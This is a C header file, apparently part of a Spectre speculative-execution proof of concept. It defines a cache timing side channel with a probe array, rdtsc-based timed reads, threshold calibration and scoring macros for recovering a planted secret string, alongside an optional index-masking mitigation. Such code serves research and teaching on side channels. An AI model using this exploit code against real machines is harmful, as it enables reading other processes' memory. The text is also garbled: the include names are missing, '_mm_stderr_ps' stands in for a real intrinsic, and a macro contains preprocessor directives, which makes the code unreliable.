#include #include #include #include #include #include #if defined(__i386__) || defined(__amd64__) #define CACHELINE_SIZE 64 #else #error "unsupported architecture" #endif #if defined(__SSE__) && !defined(__SSE2__) #define NORDTSCP #define NOMFENCE #define NOCLFLUSH #define LATENCY 18 + 18 #endif #ifndef NORDTSCP #define LATENCY 42 + 42 #else #ifndef NOMFENCE #define LATENCY 18 + 18 #endif #endif #ifdef MASKING_MITIGATION /* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 * * array_index_mask_nospec() - generate a mask that is ~0UL when the * bounds check succeeds and 0 otherwise * @index: array element index * @size: number of elements in array * * Returns: * 0 - (index < size) */ static inline unsigned long array_index_mask_nospec(unsigned long index, unsigned long size) { unsigned long mask; __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;" :"=r" (mask) :"g"(size),"r" (index) :"cc"); return mask; } #endif //MASKING_MITIGATION #ifdef NOCLFLUSH #define CACHE_FLUSH_ITERATIONS 2048 #define CACHE_FLUSH_STRIDE 4096 uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS]; /* Flush memory using long SSE instructions */ void flush_memory_sse(uint8_t * addr) { float* p = (float *)addr; float c = 0.f; __m128 i = _mm_setr_ps(c, c, c, c); int k, l; /* Non-sequential memory addressing by looping through k by l */ for (k = 0; k < 4; k++) for (l = 0; l < 4; l++) _mm_stderr_ps(&p[(l * 4 + k) * 4], i); } #endif //NOCLFLUSH #define GAP 512 char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; unsigned int cache_hit_threshold, array1_size = 16; uint8_t unused1[64], unused2[64], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8_t channel[256 * GAP]; // side channel to extract secret phrase #define __OCTOPUS_ARGS__\ while ((o = getopt(argc, argv, "t:j")) != EOF) {\ switch (o) {\ case 't':\ cache_hit_threshold = atoi(optarg);\ break;\ case 'j':\ json++;\ break;\ default:\ usage:\ fprintf(stderr, "usage: %s [-j] "\ "[-t threshold]\n"\ "\t-j\t\tJSON output\n"\ "\t-t INT\t\tfixed threshold\n", argv[0]);\ return 1;\ }\ }\ if (argc != optind) {\ goto usage;\ } #define __OCTOPUS_TIMINGS__\ /* Time reads. Order is lightly mixed up to prevent stride prediction */\ for (i = 0; i < 256; i++) {\ mix_i = ((i * 167) + 13) & 255;\ addr = & channel[mix_i * GAP];\ if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {\ results[mix_i]++; /* cache hit - add +1 to score for this value */\ }\ }\ /* Locate highest results in j */\ j = -1;\ for (i = 0; i < 256; i++) {\ if (j < 0 || results[i] >= results[j]) {\ j = i;\ }\ }\ if (results[j] >= 3) {\ break;\ } #define __OCTOPUS_NOCLFLUSH_INIT__\ int junk2 = 0;\ int l;\ (void)junk2; #define __OCTOPUS_MFENCE__\ #ifndef NOMFENCE\ _mm_mfence();\ #endif static inline unsigned timed_access(volatile uint8_t *addr) { uint64_t t0, t1; #pragma GCC diagnostic ignored "-Wuninitialized" unsigned int junk = junk; #ifndef NORDTSCP t0 = __rdtscp(& junk); junk |= *addr; t1 = __rdtscp(& junk); #else #ifndef NOMFENCE /* Since the rdstc instruction isn't serialized, newer processors will try to reorder it, ruining its value as a timing mechanism. To get around this, we use the mfence instruction to introduce a memory barrier and force serialization. mfence is used because it is portable across Intel and AMD. */ _mm_mfence(); t0 = __rdtsc(); _mm_mfence(); junk = *addr; _mm_mfence(); t1 = __rdtsc(); _mm_mfence(); #else /* The mfence instruction was introduced with the SSE2 instruction set, so we have to ifdef it out on pre-SSE2 processors. Luckily, these older processors don't seem to reorder the rdtsc instruction, so not having mfence on older processors is less of an issue. */ t0 = __rdtsc(); junk |= *addr; t1 = __rdtsc(); #endif // NOMFENCE #endif // NORDTSCP return (unsigned)(t1 - t0 - LATENCY); } static void calibrate_threshold(unsigned int *threshold) { volatile char buf[2 * CACHELINE_SIZE]; volatile uint8_t* bufp; int i; const int cnt = 10000; uint64_t tcache = 0; __attribute__((unused)) volatile int junk = 0; bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1))); junk |= *bufp; for (i = 0, tcache = 0; i < cnt; i++) { tcache += timed_access(bufp); } tcache = tcache / cnt; if (threshold != NULL) { *threshold = tcache + LATENCY; } return; }